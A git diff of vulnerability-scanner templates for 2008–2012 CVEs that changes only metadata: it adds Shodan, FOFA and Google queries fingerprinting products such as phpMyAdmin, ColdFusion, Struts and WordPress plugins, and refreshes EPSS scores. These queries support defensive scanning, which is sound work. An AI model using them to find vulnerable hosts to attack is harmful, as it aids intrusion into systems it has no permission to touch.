cve2007,cve,xss,pgadmin,phppgadmin,edb diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 929c258686..6f5363d6e1 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -25,9 +25,9 @@ info: epss-percentile: 0.7961 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wordpress - product: sniplets_plugin + product: "sniplets_plugin" tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets flow: http(1) && http(2) diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 1b24dd80bf..ce685b89f6 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -28,8 +28,14 @@ info: max-request: 2 vendor: microsoft product: exchange_server - shodan-query: http.title:"Outlook" - fofa-query: title="outlook" + shodan-query: + - http.title:"Outlook" + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve2008,cve,redirect,owa,exchange,microsoft diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 71ba384ff2..02dc427002 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: phppgadmin product: phppgadmin - shodan-query: http.title:"phpPgAdmin" + shodan-query: + - http.title:"phpPgAdmin" + - http.title:phppgadmin + - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 213d660b5b..9b6d674098 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: parallels product: h-sphere - shodan-query: title:"Parallels H-Sphere - fofa-query: title="h-sphere" - google-query: intitle:"h-sphere" + shodan-query: + - title:"Parallels H-Sphere + - http.title:"h-sphere" + - http.title:"parallels h-sphere" + fofa-query: + - title="h-sphere" + - title="parallels h-sphere" + google-query: + - intitle:"h-sphere" + - intitle:"parallels h-sphere" tags: cve,cve2008,xss,parallels,h-sphere http: diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 384346aaaf..2dd76ed994 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -15,13 +15,14 @@ info: - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.70097 + epss-percentile: 0.72879 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index bef38ec236..86be48dde0 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: boka product: siteengine - shodan-query: html:"SiteEngine" + shodan-query: + - html:"SiteEngine" + - http.html:"siteengine" fofa-query: body="siteengine" tags: cve,cve2008,redirect,siteengine,boka diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index a5a63a7618..39895ba5ff 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.title:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 7cfccf1119..bfb5193114 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2009-1496 cwe-id: CWE-22 - epss-score: 0.00802 - epss-percentile: 0.81288 + epss-score: 0.01134 + epss-percentile: 0.84662 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 7bc7dbdd0a..09cdaa2871 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2009,cve,adobe,xss,coldfusion,tenable diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 1968203952..503b926355 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.html:"joomla! - open source content management" + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve,cve2009,joomla,lfi,photo,edb diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index cc83c7f706..4c3348b407 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 - epss-score: 0.01329 - epss-percentile: 0.85735 + epss-score: 0.01077 + epss-percentile: 0.84241 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 2085401446..9bc5fbd1c1 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.html:"joomla! - open source content management" + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve2010,cve,joomla,lfi,edb,packetstorm diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 12954e5e22..3d06d8decf 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: apache product: axis2 - shodan-query: http.html:"Apache Axis" + shodan-query: + - http.html:"Apache Axis" + - http.html:"apache axis" fofa-query: body="apache axis" tags: cve,cve2010,axis,apache,default-login,axis2 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 151317113f..6c3c0bad7b 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0696 cwe-id: CWE-22 epss-score: 0.57303 - epss-percentile: 0.97418 + epss-percentile: 0.97701 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 4fab435111..a982982ba5 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index a553692caa..a0ff1cec33 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - http://www.exploit-db.com/exploits/10948 - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83839 + epss-percentile: 0.85327 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index e4bc052eb4..99cd149e3a 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index e951d57d27..d9ffa0d039 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 34e59780d7..cd8af4ca6b 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 2bacf238d4..6a39c5a97a 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -29,7 +29,10 @@ info: max-request: 1 vendor: redhat product: jboss_enterprise_application_platform - shodan-query: title:"JBoss" + shodan-query: + - title:"JBoss" + - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" + - http.title:"jboss" fofa-query: title="jboss" google-query: intitle:"jboss" tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 2ee9dcd3fa..de7a213dc7 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.92373 + epss-percentile: 0.92547 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index a257cd200a..e4bb02c47e 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 - http://www.exploit-db.com/exploits/12147 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 12ccceb83b..17455eef2b 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86892 + epss-percentile: 0.88163 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index faa548a7ba..b3d99ecc70 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.84437 + epss-percentile: 0.85844 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 9866062708..e5b89969c0 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.91267 + epss-percentile: 0.91491 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 72fac83966..22a4cc07ea 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 6395aa9c92..afe80d3941 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index c0a0bcad10..fdaa4166f1 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - http://www.exploit-db.com/exploits/11851 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83839 + epss-percentile: 0.85327 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 8ef35d4b8e..c668fb5d97 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.77311 + epss-percentile: 0.79446 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 57d5f2b9da..6bd6723fef 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 - epss-score: 0.07071 - epss-percentile: 0.93832 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 91a05a5cee..37283f304a 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.84048 + epss-percentile: 0.85468 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 3b14b099fc..72c48811af 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 - epss-score: 0.00813 - epss-percentile: 0.81409 + epss-score: 0.00917 + epss-percentile: 0.82851 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 20656fe948..7dd9f3c1fa 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.81565 + epss-percentile: 0.8192 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 45c0984796..3e0bac5c35 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 23c6b25fd1..9074aba40f 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90637 + epss-percentile: 0.91571 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index b65b57629d..a9858ba5cc 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.92278 + epss-percentile: 0.92461 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 4ca77e7694..d5b6f27b0a 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - epss-percentile: 0.89875 + epss-percentile: 0.90858 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 8df63641aa..2ab467d52d 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -19,17 +19,16 @@ info: cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 - epss-score: 0.00431 - epss-percentile: 0.74018 + epss-score: 0.00446 + epss-percentile: 0.74948 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: codeasily - product: grand_flagallery + product: "grand_flagallery" framework: wordpress - google-query: inurl:"/wp-content/plugins/flash-album-gallery" + google-query: "inurl:\"/wp-content/plugins/flash-album-gallery\"" tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index 09462b8d17..c1900d4046 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -21,8 +21,12 @@ info: max-request: 3 vendor: spamtitan product: webtitan - shodan-query: title:"WebTitan" - fofa-query: icon_hash=1090061843 + shodan-query: + - title:"WebTitan" + - http.favicon.hash:1090061843 + fofa-query: + - icon_hash=1090061843 + - title="webtitan" tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated http: diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index b1856cb394..11e84a5014 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.88084 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: bueltge product: adminimize - google-query: inurl:"/wp-content/plugins/adminimize/" + google-query: "inurl:\"/wp-content/plugins/adminimize/\"" tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge flow: http(1) && http(2) diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index b357da58e8..114f3e7776 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.6058 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wordpress - product: alert_before_you_post - google-query: inurl:"/wp-content/plugins/alert-before-your-post" + product: "alert_before_you_post" + google-query: "inurl:\"/wp-content/plugins/alert-before-your-post\"" tags: cve,cve2011,wordpress,xss,wp-plugin - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 2b7662c648..8f220b05ad 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -22,12 +22,11 @@ info: epss-percentile: 0.61346 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: skysa - product: skysa_app_bar_integration_plugin - google-query: inurl:"/wp-content/plugins/skysa-official/" + product: "skysa_app_bar_integration_plugin" + google-query: "inurl:\"/wp-content/plugins/skysa-official/\"" tags: cve,cve2011,wordpress,xss,wp-plugin,skysa - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index f1a4e9b17b..cf2c318187 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.74451 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: clickdesk - product: clickdesk_live_support-live_chat_plugin - google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" + product: "clickdesk_live_support-live_chat_plugin" + google-query: "inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\"" tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk flow: http(1) && http(2) diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 8ef215d300..8793d25fc2 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -23,10 +23,10 @@ info: epss-percentile: 0.75781 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: featurific_for_wordpress_project - product: featurific-for-wordpress - google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" + max-request: 2 + vendor: "featurific_for_wordpress_project" + product: "featurific-for-wordpress" + google-query: "inurl:\"/wp-content/plugins/featurific-for-wordpress\"" tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 357b300c5a..fd3f0db7f6 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2012,apache,rce,struts,java,edb diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 4323081301..73e0f5e6ae 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -29,8 +29,15 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: html:"Struts Problem Report" - fofa-query: body="struts problem report" + shodan-query: + - html:"Struts Problem Report" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2012,ognl,injection,edb,apache,struts variables: diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 57a2db83c7..f0e1115c83 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.60514 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: attenzione product: yousaytoo - google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" + google-query: "inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\"" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 